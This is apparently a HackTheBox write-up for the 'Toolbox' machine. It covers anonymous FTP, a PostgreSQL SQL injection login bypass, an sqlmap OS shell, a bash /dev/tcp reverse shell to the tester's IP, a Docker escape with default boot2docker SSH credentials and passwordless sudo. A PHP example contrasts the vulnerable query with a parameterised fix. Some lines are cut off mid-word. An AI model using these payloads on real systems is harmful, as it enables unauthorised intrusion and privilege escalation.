Hackthebox - Toolbox
Windows
Nmap
Let's add admin.megalogistic.com and megalogistic.com to our hosts file.
FTP
Anonymous FTP is allowed and there is one file on the target. Let's grab it:
curl --user anonymous:anonymous -o docker-toolbox.exe ftp://10.10.10.236/docker-toolbox.exe
Webserver
If we go to https://admin.megalogistic.com/ we find a login panel.
If we put a quote in the user field we can trigger a SQL error.
It is using pg_query, so the backend is PostgreSQL. Let's try the most common authentication bypass payload, translated into PostgreSQL syntax; this does the trick:
username='+or+1=1--&password=aaa
In the browser it looks like this
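As an added example (not the application's real code), here is a hypothetical PHP login handler of the shape the pg_query error suggests, building the query by string concatenation, next to a version using pg_query_params and password_verify so that the payload above is treated as data rather than SQL; $conn, the users table and its columns are assumptions:

```php
<?php
// Added example, not the box's actual code. $conn is assumed to come from
// pg_connect(); the users table and its columns are hypothetical.

// Vulnerable: the submitted username is spliced into the SQL text, so
// ' or 1=1-- closes the string literal, makes the WHERE clause always true
// and comments out the password check. A lone quote breaks the syntax,
// which is the SQL error seen on the login page.
function login_vulnerable($conn, string $username, string $password): bool
{
    $sql = "SELECT id FROM users WHERE username = '" . $username .
           "' AND password = '" . $password . "'";
    $result = pg_query($conn, $sql);
    return $result !== false && pg_num_rows($result) > 0;
}

// Hardened: pg_query_params sends the values separately from the SQL text,
// so quotes and comment markers in the input cannot change the query shape.
// The password is compared against a stored hash with password_verify
// instead of being part of the query at all.
function login_hardened($conn, string $username, string $password): bool
{
    $result = pg_query_params(
        $conn,
        'SELECT password_hash FROM users WHERE username = $1',
        [$username]
    );
    if ($result === false || pg_num_rows($result) !== 1) {
        return false;
    }
    $row = pg_fetch_assoc($result);
    return password_verify($password, $row['password_hash']);
}
```

With the hardened version the same request simply fails to match a username, and a quote in the field no longer produces a database error.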
If we google "uplusion23" we find a GitHub user, https://github.com/uplusion23. If we have a look at his GitHub page, https://uplusion23.github.io/, we find his portfolio, and then we can have a look at the admin panel on CodePen here.
We have a todo list and a list of users
subdomain
Shell as postgresql
If we use sqlmap we can get a shell on the target:
sqlmap -r request -p username --os-shell
To get the request file we just need to right-click the request in Burp and select "Save item".
We also find a .ssh folder with a known_hosts file.
We can try to add our pu
Something weird is that if we cat /etc/passwd we do not find the user tony that we found in /home. However, the tony folder belongs to root, so our root user might be named tony.
Also this seems to be a docker instance.
Let's get a reverse shell. First we set up a listener:
rlwrap nc -nlvp 1234
This way we get a more verbose shell in case of errors. Then we launch this from our previous prompt:
bash -c 'bash -i >& /dev/tcp/10.10.14.5/1234 0>&1'
uname -a gives:
command standard output: 'Linux bc56e3cc55e9 4.14.154-boot2docker #1 SMP Thu Nov 14 19:19:08 UTC 2019 x86_64 GNU/Linux'
So this is boot2docker. We know it uses this project: https://github.com/boot2docker/boot2docker
So if we want to escape docker we can ssh as docker to 172.17.0.1 (we can check ifconfig for this address):
ssh docker@172.17.0.1
We get a shell this way (the user and password are in the git repository above).
The difficulty here is that we need to upgrade our shell and be quick, because we lose the shell every few minutes.
Here is how to upgrade our shell (thanks to my friend Brianlane for the support on this part)
When we lose our shell and need to get it back we can just repeat these steps this way
And ssh again
ssh docker@172.17.0.1
If we run
sudo -l
we can see that it allows
sudo su
without having to enter any password. The flag is not in the root folder.